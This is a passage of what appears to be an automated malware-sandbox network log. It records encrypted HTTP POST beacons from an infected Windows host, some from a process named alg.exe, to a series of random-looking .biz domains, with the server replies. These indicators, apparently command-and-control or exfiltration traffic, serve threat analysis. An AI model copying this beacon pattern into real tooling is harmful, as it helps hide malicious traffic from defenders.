                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:40.449918032 CET842OUTData Raw: 50 77 4f 8f 6c 2d 52 5b 3e 03 00 00 a8 fe 3a 5e 0d f6 12 c7 c9 b1 09 02 5f f0 d1 bb 9e c2 32 97 ae c1 f5 fb e0 1e 18 c9 a6 99 04 de 2b 04 91 2e ef 71 bd d4 32 4c f2 da c0 08 36 3b 49 bb 50 76 f9 2c bd c3 17 44 43 92 f6 23 cd 89 e0 92 65 3a a0 a9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: PwOl-R[>:^_2+.q2L6;IPv,DC#e:U+DKVzuVZ4l7:qpXD@|l<+5^4^Aq:cBhT=@G&Dgltk5.C8j_:B`07^uw!Mzq
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.069847107 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:40 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=e2efb71e53d6d61684e94eba3c22e86d|155.94.241.187|1731920320|1731920320|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      117192.168.2.75009618.246.231.12080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.087790012 CET351OUTPOST /vjmsosrx HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.087804079 CET842OUTData Raw: 47 99 ff ac 36 58 67 c8 3e 03 00 00 ab 0c 37 4f 90 ba 25 08 4a c6 6a b7 8c 50 15 5d 5c 79 84 7d 5e c0 cc 4c 3f f6 23 33 9b 3b 07 f8 ae 1c 08 3b de b1 dc b7 55 c3 08 b3 22 10 c0 20 3b a6 a8 e1 df 66 c9 e4 6e 71 a2 c6 48 14 ed 42 ed e1 a5 a4 c2 23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: G6Xg>7O%JjP]\y}^L?#3;;U" ;fnqHB#u@SwX.@m)a~4os {*\)mZ8T{`ho%qSR2eKx6hEhbWCPV.sdjYt8a9UUM=-hBx)C^B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.931822062 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=5eba12e007d684ed245439dc9cec7995|155.94.241.187|1731920321|1731920321|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      118192.168.2.75009734.246.200.160805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.597793102 CET358OUTPOST /poiwrabuiumompma HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:41.597809076 CET778OUTData Raw: 6e 92 cc 22 40 f3 68 4e fe 02 00 00 cf d1 6a ff 17 2a 05 eb e2 4c 05 26 36 5c e9 fa 9d b1 92 3e e2 99 7a 4d 16 94 85 5b 38 cf 94 42 fc a5 d4 07 26 45 51 80 99 de 70 2d c6 2d 3e c7 49 eb 1b b9 70 08 eb cb a3 ac be d0 ba 45 a6 b7 cd 2a 33 a4 e3 6f
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: n"@hNj*L&6\>zM[8B&EQp-->IpE*3obUsf5`[2,T^h?KM+'!efmp;/]%&}X=iF$BSoBTOrq#i-k6,LAK+P8p.-^NYaS(}{#tLX4
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.557470083 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=3e2726d9177816938f04a1e1b6af4113|155.94.241.187|1731920322|1731920322|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      119192.168.2.7500983.254.94.18580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.046660900 CET346OUTPOST /vtpac HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.046684980 CET842OUTData Raw: a4 ff ad 13 7c a1 84 97 3e 03 00 00 aa 3d 11 e8 7a cf b7 77 89 78 ae 91 91 3c ae 1c b0 4d 51 5b a7 90 a2 3b 2a c0 5d 97 e3 f3 e1 13 dc 80 ca 6d 38 c4 ee 79 b0 fb 33 ee 64 9a 36 b6 d6 b4 e4 e5 62 1e 36 78 c7 58 20 45 29 2e 87 34 16 12 b3 f1 f3 90
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: |>=zwx<MQ[;*]m8y3d6b6xX E).43_F(M\CC2O5?XKkC:6rxd@@~@CM6T-#gq16RrBs"K$.;B<_l5J'4z%lt
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.022830009 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=108606763fec2d8bbb0bb0190295332c|155.94.241.187|1731920322|1731920322|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      120192.168.2.75009947.129.31.212805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.819463968 CET347OUTPOST /sv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:42.819489002 CET778OUTData Raw: 43 e0 8a bd 7f 53 fe 3b fe 02 00 00 e1 06 d9 2e ce af bc 99 41 41 b6 33 b6 00 83 da 5a 39 44 75 4a 50 b8 21 82 4f cb 37 51 9f 45 f8 f6 90 19 e5 1b a7 7f 29 66 14 5b cc 4a 66 57 62 d2 e6 44 60 cb d2 7a d2 39 b5 19 9b 39 dc 1f 3d 1a 7f d4 47 80 22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: CS;.AA3Z9DuJP!O7QE)f[JfWbD`z99=G"\6[V08Ft@v|$Bs 0+jjY/4=<o v&5\n1D8DDj[4VZ[`;#9?FLYmU1JI)qo3:
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.301110029 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=7f12992277f465d4c5c8385f9cf3dd13|155.94.241.187|1731920324|1731920324|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      121192.168.2.75010085.214.228.14080
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.042354107 CET346OUTPOST /oq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.042397022 CET842OUTData Raw: 31 2f 16 70 21 ff 00 e1 3e 03 00 00 06 db 22 51 94 a1 d2 df 67 ef b1 67 4f 95 c0 f7 d3 fd 72 02 2d ec 3f ec 01 9f a4 21 f7 8b f4 22 c6 66 a4 6c da 07 8e b6 00 02 50 66 5f ac 27 64 5f d2 0b 56 15 04 08 73 5a c5 52 8a 45 56 85 ad cd 2b 78 a1 67 c6
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 1/p!>"QggOr-?!"flPf_'d_VsZREV+xgqE'el+aWTRax<4&GT!'9\KY84:&wr?lBBx?;!cEYHz;!N=)~SI}/c`]!Cp+U_F}r$ib
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.921344042 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:43 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.923193932 CET360OUTPOST /nurhntuqrhttbayt HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: dlynankz.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:43.923266888 CET842OUTData Raw: 8f ad c7 0c af db ca 97 3e 03 00 00 b5 ee a1 d4 89 b6 9f 00 4a 49 50 43 6f bf fc a0 1d b6 fa 62 d8 2a cc 34 90 94 84 00 c8 a3 71 8b 0e 8c 7a ae bc 85 19 5a 34 dc ee d6 c4 31 2c 75 5c c9 72 4f 31 d2 c3 e7 3d f0 c0 28 3a dc 49 3f 82 b4 38 e9 06 fb
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: >JIPCob*4qzZ41,u\rO1=(:I?8(HrmAx[%PO|ezY"02:CM9%^o4q<9{C'^w3jPq>fSZI!mR'M~<b0%]^;^{zCb,"I
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.189199924 CET176INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 19
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 404 page not found


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      122192.168.2.75010147.129.31.21280
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.209769964 CET348OUTPOST /qxbbm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: oflybfv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.209788084 CET842OUTData Raw: 24 bb 7f 4c 8b 0e 30 72 3e 03 00 00 55 f9 b6 a2 dc 4e 58 6c 36 85 fa 3b 94 67 22 1e 99 7c 3f 54 ba 48 03 1e f6 d9 4a 24 a9 51 2c ef 65 c2 2e 56 37 61 87 3d e5 c7 da bf 61 95 13 9b 9a 87 bd d1 ef eb 33 6d 10 f8 a8 9d b6 72 05 cc ce a1 71 6c 8d 17
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: $L0r>UNXl6;g"|?THJ$Q,e.V7a=a3mrqlrSb'Lev?S,K,-X@=4ORvZNAZ]%fOV2[B?z(8X..k4NG7!i$`;NYi/b<1nc}
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.682796955 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=4ebce090d009c3640ce3694a7e4b87d0|155.94.241.187|1731920325|1731920325|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      123192.168.2.7501023.94.10.34805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.773525000 CET355OUTPOST /vhxrnsynbee HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:44.773566961 CET778OUTData Raw: 78 dd fe 60 db b5 b8 ae fe 02 00 00 73 6c 92 5d 6a 9a 54 eb 00 fe 92 1c 38 a1 85 c4 d1 9f aa 15 19 45 68 c8 c9 d4 91 9e 93 e2 e3 0c 43 65 31 93 9b 18 c3 ec 53 99 dc f7 a0 4a 36 cd 09 47 92 f9 f9 71 02 d1 35 c2 73 ab a1 51 ee da fb 8a d2 45 f2 38
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: x`sl]jT8EhCe1SJ6Gq5sQE81A8G4J :%hW\XO"=fx4s1* NN?(Mej2*5ziojC#`25L[kXIMRS4pJKA
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.436223030 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=880fc585cd326c9ff6f9f34890d4b118|155.94.241.187|1731920325|1731920325|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                      124192.168.2.75010334.211.97.4580
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.718875885 CET349OUTPOST /tgkqrcfn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: yhqqc.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Length: 842
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:45.718875885 CET842OUTData Raw: 7b 73 e3 3b 29 a9 bc 7e 3e 03 00 00 38 d4 ec c8 0e 58 bb d9 9b 65 a3 f3 34 96 8f 17 8d 47 30 3b 54 a0 40 04 fd c4 51 c3 4b 88 d7 15 a7 c5 29 da d6 c1 6c 41 ae f2 98 c5 34 a3 1d 8f c6 e8 90 d6 a8 6a 0a f5 a8 0b cb 7b 1a 9a 66 7c bb 10 80 13 dc 53
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: {s;)~>8Xe4G0;T@QK)lA4j{f|SUC6@]?-y?H/;Z\CpF6[?+_mguDft7Jpw4|v4%kfP[A"+u~2h(9-f{2}ym1c|
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.548098087 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                      Date: Mon, 18 Nov 2024 08:58:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: btst=062e1dcd1a8079011682815400bbf5b3|155.94.241.187|1731920326|1731920326|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                      Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                      125192.168.2.75010435.164.78.200805368C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                      Nov 18, 2024 09:58:46.079933882 CET349OUTPOST /gajxy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                      Host: tnevuluw.biz
